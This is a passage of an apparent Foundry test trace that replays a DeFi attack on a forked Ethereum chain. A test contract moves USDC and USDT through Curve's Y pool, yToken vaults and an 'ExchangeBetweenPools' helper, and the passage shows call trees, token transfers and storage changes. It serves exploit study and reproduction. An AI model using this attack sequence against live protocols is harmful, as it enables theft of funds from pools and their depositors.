    │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], value: 95397529165 [9.539e10])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2b326c195b4bf13398fccd87e6e23fac6ff3d9dc0e93a62080b304ab12378cdd: 0x00000000000000000000000000000000000000000000000000000018f488d6f5 → 0x0000000000000000000000000000000000000000000000000000002f2aab9d42
    │   │   │   │   │   @ 7: 0x0000000000000000000000000000000000000000000000000000006f4cc397a1 → 0x0000000000000000000000000000000000000000000000000000008b41340396
    │   │   │   │   │   @ 6: 63451 → 63452
    │   │   │   │   │   @ 0xc57933870e25484f1a32848b2d385f35ac8eda937f3a5cf7e840dbb4012cc47f: 0x0000000000000000000000000000000000000000000000000000001bf08eb000 → 0
    │   │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000000000000000587e3f2541 → 0x0000000000000000000000000000000000000000000000000000006eb461eb8e
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [120068] 0x83f798e925BcD4017Eb265844FDDAbb448f1707D::withdraw(8903409274900820941169 [8.903e21])
    │   │   │   │   ├─ [1031] USDT::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 72108275209 [7.21e10]
    │   │   │   │   ├─ [803] 0x71fc860F7D3A592A4a98740e39dB31d25db65ae8::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [15130] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0x83f798e925BcD4017Eb265844FDDAbb448f1707D, 0), 0) [staticcall]
    │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 13804947768087488 [1.38e16], 1820393572179453153354 [1.82e21]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000bbde
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [3780] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   ├─ [2257] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::delegateToImplementation(0x70a0823100000000000000000000000083f798e925bcd4017eb265844fddabb448f1707d) [staticcall]
    │   │   │   │   │   │   ├─ [600] 0x3363BAe2Fc44dA742Df13CD3ee94b6bB868ea376::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ emit Transfer(from: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], to: 0x0000000000000000000000000000000000000000, value: 8903409274900820941169 [8.903e21])
    │   │   │   │   ├─ [1031] USDT::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 72108275209 [7.21e10]
    │   │   │   │   ├─ [37601] USDT::transfer(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 71076010671 [7.107e10])
    │   │   │   │   │   ├─ emit Transfer(from: 0x83f798e925BcD4017Eb265844FDDAbb448f1707D, to: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], value: 71076010671 [7.107e10])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x59eeeba12578e687e664f3dd30fc04063e3d7d6d103f260d4ce00789662b3f9b: 0x00000000000000000000000000000000000000000000000000000010c9fcf609 → 0x000000000000000000000000000000000000000000000000000000003d871b5a
    │   │   │   │   │   │   @ 0x22510e9e02d96ab71c7f73b52231824e7e4dc3cfec7d1c55572e3ae933a8a688: 0 → 0x000000000000000000000000000000000000000000000000000000108c75daaf
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [1031] USDT::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1032264538 [1.032e9]
    │   │   │   │   ├─ [803] 0x71fc860F7D3A592A4a98740e39dB31d25db65ae8::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [15130] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0x83f798e925BcD4017Eb265844FDDAbb448f1707D, 0), 0) [staticcall]
    │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 13804947768087488 [1.38e16], 1820393572179453153354 [1.82e21]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000bbde
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [3780] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   ├─ [2257] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::delegateToImplementation(0x70a0823100000000000000000000000083f798e925bcd4017eb265844fddabb448f1707d) [staticcall]
    │   │   │   │   │   │   ├─ [600] 0x3363BAe2Fc44dA742Df13CD3ee94b6bB868ea376::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 6: 43380 → 43381
    │   │   │   │   │   @ 2: 0x0000000000000000000000000000000000000000000001e9aa21102dfd8048ef → 0x000000000000000000000000000000000000000000000007028124f0ffd9ef7e
    │   │   │   │   │   @ 8: 0x00000000000000000000000000000000000000000000000000000010c9fcf609 → 0x000000000000000000000000000000000000000000000000000000003d871b5a
    │   │   │   │   │   @ 0x22510e9e02d96ab71c7f73b52231824e7e4dc3cfec7d1c55572e3ae933a8a688: 0 → 0x000000000000000000000000000000000000000000000000000000108c75daaf
    │   │   │   │   │   @ 0x2b326c195b4bf13398fccd87e6e23fac6ff3d9dc0e93a62080b304ab12378cdd: 0x0000000000000000000000000000000000000000000001e32cc8856bdd7b3e8a → 0x00000000000000000000000000000000000000000000000085289a2edfd4e519
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [1031] USDT::balanceOf(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51]) [staticcall]
    │   │   │   │   └─ ← [Return] 71076010671 [7.107e10]
    │   │   │   ├─ [28801] USDT::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 71076010671 [7.107e10])
    │   │   │   │   ├─ emit Transfer(from: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 71076010671 [7.107e10])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0 → 0x000000000000000000000000000000000000000000000000000000108c75daaf
    │   │   │   │   │   @ 0x22510e9e02d96ab71c7f73b52231824e7e4dc3cfec7d1c55572e3ae933a8a688: 0x000000000000000000000000000000000000000000000000000000108c75daaf → 0
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit TokenExchangeUnderlying(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 1, param2: 120000000000 [1.2e11], param3: 2, param4: 71076010671 [7.107e10])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x405787fa12a823e0f2b7631cc41b3ba8828b3321ca811111fa75cd3aa3bb5acf: 0x00000000000000000000000000000000000000000000000000000018f47f2b3c → 0x0000000000000000000000000000000000000000000000000000002f2aa1f188
    │   │   │   │   @ 0x2b326c195b4bf13398fccd87e6e23fac6ff3d9dc0e93a62080b304ab12378cdd: 0x00000000000000000000000000000000000000000000000000000018f488d6f5 → 0x0000000000000000000000000000000000000000000000000000002f2aab9d42
    │   │   │   │   @ 0xb84c66a23d16cc0363dcea44a1c2d7a9d7a60de1c8dc51dbc21234ce129d6cf4: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffe40f714fff
    │   │   │   │   @ 0xc57933870e25484f1a32848b2d385f35ac8eda937f3a5cf7e840dbb4012cc47f: 0 → 0x0000000000000000000000000000000000000000000000000000001bf08eb000
    │   │   │   │   @ 0x405787fa12a823e0f2b7631cc41b3ba8828b3321ca811111fa75cd3aa3bb5ad0: 0x0000000000000000000000000000000000000000000001e32476088b84582d0d → 0x000000000000000000000000000000000000000000000000641d5486ce25cec6
    │   │   │   └─ ← [Stop]
    │   │   ├─ [551643] ExchangeBetweenPools::doExchange(119023523157 [1.19e11])
    │   │   │   ├─ [6101] 0x9Ab872A34139015Da07EE905529a8842a6142971::balance()
    │   │   │   │   ├─ [3315] USDC::balanceOf(0x9Ab872A34139015Da07EE905529a8842a6142971)
    │   │   │   │   │   ├─ [2529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x9Ab872A34139015Da07EE905529a8842a6142971) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 119023523157 [1.19e11]
    │   │   │   │   │   └─ ← [Return] 119023523157 [1.19e11]
    │   │   │   │   └─ ← [Return] 119023523157 [1.19e11]
    │   │   │   ├─ [45588] 0x9Ab872A34139015Da07EE905529a8842a6142971::issue(ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D], 119023523157 [1.19e11])
    │   │   │   │   ├─ [2520] 0x7d8E92748F13E30F99386cd253F2ca7a0659321A::is_trusted(ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D])
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─ [1315] USDC::balanceOf(0x9Ab872A34139015Da07EE905529a8842a6142971)
    │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x9Ab872A34139015Da07EE905529a8842a6142971) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 119023523157 [1.19e11]
    │   │   │   │   │   └─ ← [Return] 119023523157 [1.19e11]
    │   │   │   │   ├─ [33517] USDC::transfer(ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D], 119023523157 [1.19e11])
    │   │   │   │   │   ├─ [32728] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D], 119023523157 [1.19e11]) [delegatecall]
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x9Ab872A34139015Da07EE905529a8842a6142971, to: ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D], value: 119023523157 [1.19e11])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x7410a8ad59c4b2473ffedc5fbc68d50e779573e2e8fc37bf21a509722c82f6a4: 0x0000000000000000000000000000000000000000000000000000001bb65ad555 → 0
    │   │   │   │   │   │   │   @ 0xfa9abfc9420dca98c77aacca6630899de49f21d48a5d994401b98371e2da3817: 0 → 0x0000000000000000000000000000000000000000000000000000001bb65ad555
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit issue_token(: ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D], : 119023523157 [1.19e11])
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [1315] USDC::balanceOf(ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D]) [staticcall]
    │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D]) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 119023523157 [1.19e11]
    │   │   │   │   └─ ← [Return] 119023523157 [1.19e11]
    │   │   │   ├─ [3426] USDC::allowance(ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D], curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51]) [staticcall]
    │   │   │   │   ├─ [2637] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::allowance(ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D], curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51]) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [23767] USDC::approve(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 119023523157 [1.19e11])
    │   │   │   │   ├─ [22978] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::approve(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 119023523157 [1.19e11]) [delegatecall]
    │   │   │   │   │   ├─ emit Approval(owner: ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D], spender: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], value: 119023523157 [1.19e11])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x2f82a5737c68d420b1e54627c6a68af82ff19c7003d17cd0c16d0313f5f3f47a: 0 → 0x0000000000000000000000000000000000000000000000000000001bb65ad555
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [437699] curveYSwap::exchange_underlying(1, 2, 119023523157 [1.19e11], 0)
    │   │   │   │   ├─ [35413] 0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01::getPricePerFullShare() [staticcall]
    │   │   │   │   │   ├─ [602] 0x6B175474E89094C44Da98b954EedeAC495271d0F::balanceOf(0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 31951343451222398754991 [3.195e22]
    │   │   │   │   │   ├─ [6496] 0xfC1E690f61EFd961294b3e1Ce3313fBD8aa4f85d::balanceOf(0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01) [staticcall]
    │   │   │   │   │   │   ├─ [3312] 0x3dfd23A6c5E8BbcFc9581d2E864a68feb6a076d3::getReserveNormalizedIncome(0x6B175474E89094C44Da98b954EedeAC495271d0F) [staticcall]
    │   │   │   │   │   │   │   ├─ [2569] 0x2847A5D7Ce69790cb40471d454FEB21A0bE1F2e3::getReserveNormalizedIncome(0x6B175474E89094C44Da98b954EedeAC495271d0F) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003d148a340c47c460b474173
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003d148a340c47c460b474173
    │   │   │   │   │   │   └─ ← [Return] 442096211614379858872543 [4.42e23]
    │   │   │   │   │   ├─ [15172] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01, 0), 3) [staticcall]
    │   │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(0x6B175474E89094C44Da98b954EedeAC495271d0F, 1304347360753391460608 [1.304e21], 1425467089982243776205052 [1.425e24]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000588c54
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─ [509] 0x493C57C4763932315A328269E1ADaD09653B9081::balanceOf(0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [4773] 0x5d3a536E4D6DbD6114cc1Ead35777bAB948E3643::balanceOf(0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01) [staticcall]
    │   │   │   │   │   │   ├─ [2257] 0x5d3a536E4D6DbD6114cc1Ead35777bAB948E3643::delegateToImplementation(0x70a0823100000000000000000000000016de59092dae5ccf4a1e6439d611fd0653f0bd01) [staticcall]
    │   │   │   │   │   │   │   ├─ [600] 0x3363BAe2Fc44dA742Df13CD3ee94b6bB868ea376::balanceOf(0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   └─ ← [Return] 1133529323263304087 [1.133e18]
    │   │   │   │   ├─ [31906] 0xd6aD7a6750A7593E092a9B218d66C0A814a3436e::getPricePerFullShare() [staticcall]
    │   │   │   │   │   ├─ [1315] USDC::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 242347570202 [2.423e11]
    │   │   │   │   │   │   └─ ← [Return] 242347570202 [2.423e11]
    │   │   │   │   │   ├─ [6496] 0x9bA00D6856a4eDF4665BcA2C2309936572473B7E::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   │   ├─ [3312] 0x3dfd23A6c5E8BbcFc9581d2E864a68feb6a076d3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [staticcall]
    │   │   │   │   │   │   │   ├─ [2569] 0x2847A5D7Ce69790cb40471d454FEB21A0bE1F2e3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   │   └─ ← [Return] 355746811772 [3.557e11]
    │   │   │   │   │   ├─ [15172] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, 0), 2) [staticcall]
    │   │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], 2101112444 [2.101e9], 815523071572 [8.155e11]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000f951d4
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─ [509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [553] 0x39AA39c021dfbaE8faC545936693aC917d5E7563::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   └─ ← [Return] 1257894214344187980 [1.257e18]
    │   │   │   │   ├─ [29076] 0x83f798e925BcD4017Eb265844FDDAbb448f1707D::getPricePerFullShare() [staticcall]
    │   │   │   │   │   ├─ [1031] USDT::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1032264538 [1.032e9]
    │   │   │   │   │   ├─ [803] 0x71fc860F7D3A592A4a98740e39dB31d25db65ae8::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [15130] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0x83f798e925BcD4017Eb265844FDDAbb448f1707D, 0), 0) [staticcall]
    │   │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 13804947768087488 [1.38e16], 1820393572179453153354 [1.82e21]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000bbde
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─ [509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [3780] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   │   ├─ [2257] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::delegateToImplementation(0x70a0823100000000000000000000000083f798e925bcd4017eb265844fddabb448f1707d) [staticcall]
    │   │   │   │   │   │   │   ├─ [600] 0x3363BAe2Fc44dA742Df13CD3ee94b6bB868ea376::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   └─ ← [Return] 7983010 [7.983e6]
    │   │   │   │   ├─ [31690] 0x73a052500105205d34Daf004eAb301916DA8190f::getPricePerFullShare() [staticcall]
    │   │   │   │   │   ├─ [1185] 0x0000000000085d4780B73119b644AE5ecd22b376::balanceOf(0x73a052500105205d34Daf004eAb301916DA8190f) [staticcall]
    │   │   │   │   │   │   ├─ [486] 0xB650eb28d35691dd1BD481325D40E65273844F9b::balanceOf(0x73a052500105205d34Daf004eAb301916DA8190f) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 85146961356411071020451 [8.514e22]
    │   │   │   │   │   │   └─ ← [Return] 85146961356411071020451 [8.514e22]
    │   │   │   │   │   ├─ [6496] 0x4DA9b813057D04BAef4e5800E36083717b4a0341::balanceOf(0x73a052500105205d34Daf004eAb301916DA8190f) [staticcall]
    │   │   │   │   │   │   ├─ [3312] 0x3dfd23A6c5E8BbcFc9581d2E864a68feb6a076d3::getReserveNormalizedIncome(0x0000000000085d4780B73119b644AE5ecd22b376) [staticcall]
    │   │   │   │   │   │   │   ├─ [2569] 0x2847A5D7Ce69790cb40471d454FEB21A0bE1F2e3::getReserveNormalizedIncome(0x0000000000085d4780B73119b644AE5ecd22b376) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000004239e4ca4ca1c6f47d10376
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000004239e4ca4ca1c6f47d10376
    │   │   │   │   │   │   └─ ← [Return] 272770619034611513332400 [2.727e23]
    │   │   │   │   │   ├─ [15130] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0x73a052500105205d34Daf004eAb301916DA8190f, 0), 0) [staticcall]
    │   │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 13804947768087488 [1.38e16], 1820393572179453153354 [1.82e21]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000bbde
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─ [509] 0x49f4592E641820e928F9919Ef4aBd92a719B4b49::balanceOf(0x73a052500105205d34Daf004eAb301916DA8190f) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [553] 0x39AA39c021dfbaE8faC545936693aC917d5E7563::balanceOf(0x73a052500105205d34Daf004eAb301916DA8190f) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   └─ ← [Return] 1219188455269113215 [1.219e18]
    │   │   │   │   ├─ [25892] USDC::transferFrom(ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D], curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 119023523157 [1.19e11])
    │   │   │   │   │   ├─ [25097] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transferFrom(ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D], curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 119023523157 [1.19e11]) [delegatecall]
    │   │   │   │   │   │   ├─ emit Transfer(from: ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D], to: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], value: 119023523157 [1.19e11])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xfa9abfc9420dca98c77aacca6630899de49f21d48a5d994401b98371e2da3817: 0x0000000000000000000000000000000000000000000000000000001bb65ad555 → 0
    │   │   │   │   │   │   │   @ 0x2f82a5737c68d420b1e54627c6a68af82ff19c7003d17cd0c16d0313f5f3f47a: 0x0000000000000000000000000000000000000000000000000000001bb65ad555 → 0
    │   │   │   │   │   │   │   @ 0x635b0924ad3ff062680f0aea3cfbd7f0ef6cb2bf55ef6efc316550a341c17ac3: 0 → 0x0000000000000000000000000000000000000000000000000000001bb65ad555
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [23767] USDC::approve(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, 119023523157 [1.19e11])
    │   │   │   │   │   ├─ [22978] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::approve(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, 119023523157 [1.19e11]) [delegatecall]
    │   │   │   │   │   │   ├─ emit Approval(owner: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], spender: 0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, value: 119023523157 [1.19e11])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xc57933870e25484f1a32848b2d385f35ac8eda937f3a5cf7e840dbb4012cc47f: 0 → 0x0000000000000000000000000000000000000000000000000000001bb65ad555
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [74910] 0xd6aD7a6750A7593E092a9B218d66C0A814a3436e::deposit(119023523157 [1.19e11])
    │   │   │   │   │   ├─ [1315] USDC::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 242347570202 [2.423e11]
    │   │   │   │   │   │   └─ ← [Return] 242347570202 [2.423e11]
    │   │   │   │   │   ├─ [6496] 0x9bA00D6856a4eDF4665BcA2C2309936572473B7E::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
